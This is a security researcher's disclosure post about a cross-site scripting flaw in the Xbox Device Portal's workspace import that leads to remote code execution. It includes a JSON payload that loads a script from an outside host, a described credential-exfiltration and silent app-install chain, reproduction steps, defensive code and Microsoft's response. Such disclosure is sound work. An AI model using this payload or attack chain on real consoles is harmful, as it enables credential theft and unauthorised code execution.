XSS to RCE - Exploiting the Xbox Device Portal

Crafted By Gemini 2.5 25/05/2025 Microsoft

The Xbox Device Portal is an invaluable tool for developers, offering remote access to an Xbox console in developer mode via a web browser. It allows for deploying apps, managing files, and monitoring performance. However, a vulnerability discovered within this portal highlights the potential risks even in developer-focused tools, especially when robust security measures like Content Security Policy (CSP) are absent.

This post details a Cross-Site Scripting (XSS) vulnerability found in the "Import Workspace" feature of the Xbox Device Portal, its potential impact, and the subsequent response from Microsoft.

The Vulnerability: How It Works

The core of the vulnerability lies in how the Xbox Device Portal handles custom workspace imports. Developers can create and import .workspace files, which are JSON formatted files defining the layout and tools within the portal.

The specific point of injection is the "name" key within the JSON structure of a workspace file.

Here’s an example snippet from a malicious test.workspace file, showing the payload in the name field:
{
  "layout": {
    "name": "\"><img src=x onerror=\"var a=document.createElement('script');a.src='//xss.ash-king.co.uk/xbox';document.body.appendChild(a)\" />\"",
    // ... other workspace configuration ...
  }
}

When a user imports this crafted workspace file, the Device Portal application takes the value of the "name" key and appends it to the workspace menu. Crucially, the application renders this name as HTML without proper sanitization. This oversight, combined with a lack of a Content Security Policy (CSP) to restrict what content can be loaded or executed, allows the embedded HTML and JavaScript payload to run in the context of the user's browser session with the Device Portal.
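The rendering flaw described above, placed next to a hardened version, as an added example that is not the Device Portal's own code: the menu rendering is modelled with string templating in Node rather than the real DOM, the workspace content is constructed, and the payload is a harmless marker instead of the remote-script loader.

```javascript
// Added example, not the Device Portal's own code: models how the import
// feature turns layout.name into a menu entry, the unsafe way and the hardened way.

// Constructed test.workspace content in the shape the post describes; the
// payload here is a harmless marker rather than the remote-script loader.
const WORKSPACE_JSON = JSON.stringify({
  layout: { name: '"><img src=x onerror="alert(1)" />"' },
});

// Escape the five characters that can break out of HTML text or attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// VULNERABLE pattern (what the post describes): the imported name is spliced
// into markup as-is, so the <img onerror=...> fragment becomes live HTML.
function renderMenuItemUnsafe(workspaceJson) {
  const ws = JSON.parse(workspaceJson);
  return `<li class="workspace">${ws.layout.name}</li>`;
}

// HARDENED pattern: the name is data, never markup. In a real DOM this is
// li.textContent = name rather than li.innerHTML = name.
function renderMenuItemSafe(workspaceJson) {
  const ws = JSON.parse(workspaceJson);
  return `<li class="workspace">${escapeHtml(ws.layout.name)}</li>`;
}

// Import-boundary validation: a workspace name only needs to be a short
// printable label, so anything else is rejected before it reaches the UI.
function validateWorkspaceName(name) {
  if (typeof name !== 'string' || name.length === 0 || name.length > 64) {
    return { ok: false, reason: 'name must be a 1-64 character string' };
  }
  if (/[<>"'&\u0000-\u001f]/.test(name)) {
    return { ok: false, reason: 'name contains markup or control characters' };
  }
  return { ok: true, name };
}

// Defence in depth the post notes was missing: this policy refuses both an
// inline onerror handler and a script loaded from another origin, so a
// missed escape no longer yields code execution.
const CSP_HEADER =
  "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";
```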

The Impact: From Data Exfiltration to Remote Code Execution

The proof-of-concept demonstrated in the video showcases a two-stage attack:

  • Stage 1: Sensitive Information Exfiltration:
    Once the malicious workspace is imported and the XSS payload triggers, the injected script (payload.js hosted externally in the example) executes. This script can then make requests to the Device Portal's internal APIs.
    • Exposed Data: This allows access to sensitive information such as SMB usernames and passwords, console serial numbers, and other potentially personally identifiable information (PII) reachable through these APIs. In the proof-of-concept this information was logged to the web browser's developer console. Here is an example of some of the data we can access:
          {
            "OSVersion": "10.0.22621.2864 (xb_flt_2211ni.221130-1745)",
            "DevMode": "Universal Windows App Devkit",
            "OsEdition": "November 2022",
            "ConsoleType": "Lockhart",
            "ConsoleId": "████████████████████",
            "DeviceId": "███████████████",
            "SerialNumber": "████████",
            "DevkitCertificateExpirationTime": 1681409222
          },
          {
            "ComputerName": "XBOX",
            "Language": "en-US",
            "OsEdition": "SystemOS",
            "OSEditionId": 192,
            "OSVersion": "22621.2864.amd64fre.xb_flt_2211ni.221130-1745",
            "Platform": "Xbox Series S",
            "UserId": ██,
            "EmailAddress": "██████████",
            "AutoSignIn": false,
            "Gamertag": "█████████",
            "XboxUserId": "██████",
            "SignedIn": true
          }
        ],
        "Path": "D:\\DevelopmentFiles",
        "Username": "DevToolsUser",
        "Password": "████████"
      }

  • Stage 2: Remote Code Execution (RCE):
    The Device Portal APIs don't just expose data; they also allow an authenticated user (a role the XSS script effectively assumes, because it runs inside that user's browser session) to upload and run packages on the Xbox console.
    • Silent App Installation: The second stage of the example payload leverages this capability to download an application bundle from an external source and install it onto the Xbox console, all without any further user interaction beyond the initial workspace import. This demonstrates a clear path to RCE on the developer console.

Steps To Reproduce

  1. Launch the Xbox console into dev mode.
  2. Ensure Remote Access is enabled on the console.
  3. Access the Xbox Device Portal web app by navigating to the IP address displayed on the Xbox's Dev Home screen.
  4. Click the menu icon (top left) and select "Import workspace."
  5. Attach the malicious .workspace file (e.g., test.workspace).
  6. Click "Import."
  7. Upon page reload, the XSS payload executes.
    • Sensitive information would appear in the browser's developer console.
    • The Xbox console would silently install the externally hosted app bundle.

Disclosure Timeline and Microsoft's Response

  • Vulnerability Reported to Microsoft: February 13th, 2023
  • Microsoft's Response Received: June 20th, 2023

Microsoft's MSRC (Microsoft Security Response Center) provided the following response, marking the case as complete:

Hello Ash,

Thank you again for submitting this issue to Microsoft. Currently, MSRC prioritizes vulnerabilities that are assessed as “Important” or “Critical” severities for immediate servicing. After careful investigation, this case has been assessed as Moderate severity and does not meet MSRC’s bar for immediate servicing since WDP being enabled with auth defaulted to off on ERA devkits, which is the only scenario where we support untrusted networks. The engineering team is looking at this report and may adopt a stricter security model in the future.

Key Takeaways from Microsoft's Response:

  • The vulnerability was assessed as "Moderate" severity.
  • It does not meet the bar for immediate servicing (patching).
  • The rationale hinges on the context: Microsoft states the primary risk scenario is when Windows Device Portal (WDP, the underlying tech for Xbox Device Portal) is enabled with authentication defaulted to off on "ERA devkits" (likely referring to Early Release Access or specific developer kit configurations) operating on untrusted networks.
  • The engineering team is aware and may consider a stricter security model in the future.

Conclusion and Developer Awareness

While Microsoft has assessed this vulnerability as "Moderate" and closed the report, citing the specific conditions it believes are required for significant risk (authentication off on devkits on untrusted networks), the potential for data exfiltration and RCE is concerning for any developer using the Xbox Device Portal.

Developers should exercise caution when importing workspace files from untrusted or unverified sources. The lack of CSP is a significant contributing factor here, as a well-implemented CSP could have mitigated the XSS payload's ability to execute or connect to external resources.

Even if authentication is typically enabled, this vulnerability underscores the importance of input sanitization and defense-in-depth. We hope Microsoft will indeed "adopt a stricter security model" for the Device Portal in a future update to better protect developers and the sensitive data their consoles might handle.

Stay safe, and always be vigilant about the tools and files you use in your development workflows.